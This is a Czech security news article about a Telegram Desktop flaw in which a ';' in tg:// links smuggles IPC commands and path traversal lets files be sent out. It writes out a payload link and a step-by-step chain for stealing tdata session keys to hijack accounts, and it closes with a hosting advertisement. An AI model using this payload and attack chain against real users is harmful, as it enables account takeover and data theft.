Zranitelnost v aplikaci Telegram Desktop umožňuje odesílání libovolných souborů kliknutím na odkaz.

Byly zveřejněny podrobnosti a metody zneužití zranitelnosti (CVE-2026-107181) v aplikaci Telegram Desktop, oficiálním desktopovém klientovi Telegramu. Problém je způsoben nesprávným zpracováním znaků neuniknutého oddělovače v příkazech IPC. To umožňovalo kliknutím na sdílený odkaz přenést jakékoli soubory ze systému oběti útočníkovi, včetně souborů obsahujících klíče relace, které by mohly být použity k únosu účtu Telegramu. Zranitelnost je opravena v aplikaci Telegram Desktop 7.2.9.

Po kliknutí na odkazy „tg://“ operační systém spustí aplikaci Telegram Desktop, která je s tímto typem odkazu spojena. Pokud je v systému již spuštěna jiná instance této aplikace, běžící proces jí odkaz předá přes socket s využitím rozhraní IPC. Problém je v tom, že pokud mezi parametry odkazu zahrnete znak „;“ (například „tg://x?a=1;OPEN…“), obsah se rozdělí a části následující za znakem „;“ se zpracují jako samostatné příkazy.

Útok využívá příkaz OPEN spolu se schématem URI „interpret:“, které je navrženo ke spouštění servisních skriptů prostřednictvím IPC, jež se používají k automatickému odesílání nových verzí do kanálů. Skript je předdefinovaný lokální soubor, který určuje soubor, který má být odeslán do kanálu, a ID kanálu. Cesta ke skriptům se zpracovává vzhledem k podadresáři služby, ale kvůli absenci oddělování „../“ v cestách k souborům může útočník přistupovat k souborům uloženým mimo základní adresář. Mohl by například nahrát soubor do své skupiny v Telegramu a poté na něj odkazovat jako na skript vytvořením odkazu takto:

tg://x?a=1;OPEN:interpret:../../../Downloads/Telegram%20Desktop/instructions.txt

Fáze útoku:

  • Útočník přidá oběť do své skupiny (ve výchozím nastavení přidání oběti nevyžaduje potvrzení od přidávané osoby) a odešle skupině textový soubor obsahující kanál a cestu ke skriptu. Telegram tento soubor uloží do předdefinovaného systémového podadresáře, když se oběť připojí ke skupině.

    kanál: 2005234537
    file: tdata/D877F783D5D3EF8Cs

  • Útočník pošle oběti nevinně vypadající odkaz na její hosting (např. „https://coolsite.org“), který po otevření přesměrováním na server URI útočníka je nahrazeno URI ve tvaru 'tg://x?a=1;OPEN:interpret:…;OPEN:interpret:…'.
  • Po kliknutí na odkaz prohlížeč zavolá obslužnou rutinu URI „tg://“, která spustí výše zmíněný řetězec provádění příkazů, jehož výsledkem je odeslání souborů na kanál útočníka bez zobrazení jakýchkoli oznámení nebo dotazu na potvrzení odeslání.
  • Po obdržení souborů z podadresáře tdata obsahujících šifrovací a autorizační klíče a bez lokálního hesla nastaveného uživatelem může útočník naklonovat relaci připojení oběti na jejím zařízení.

Zdroj: opennet.ru

Kupte si spolehlivý hosting pro stránky s DDoS ochranou, VPS VDS servery 🔥 Kupte si spolehlivý webhosting s ochranou DDoS, VPS VDS servery | ProHoster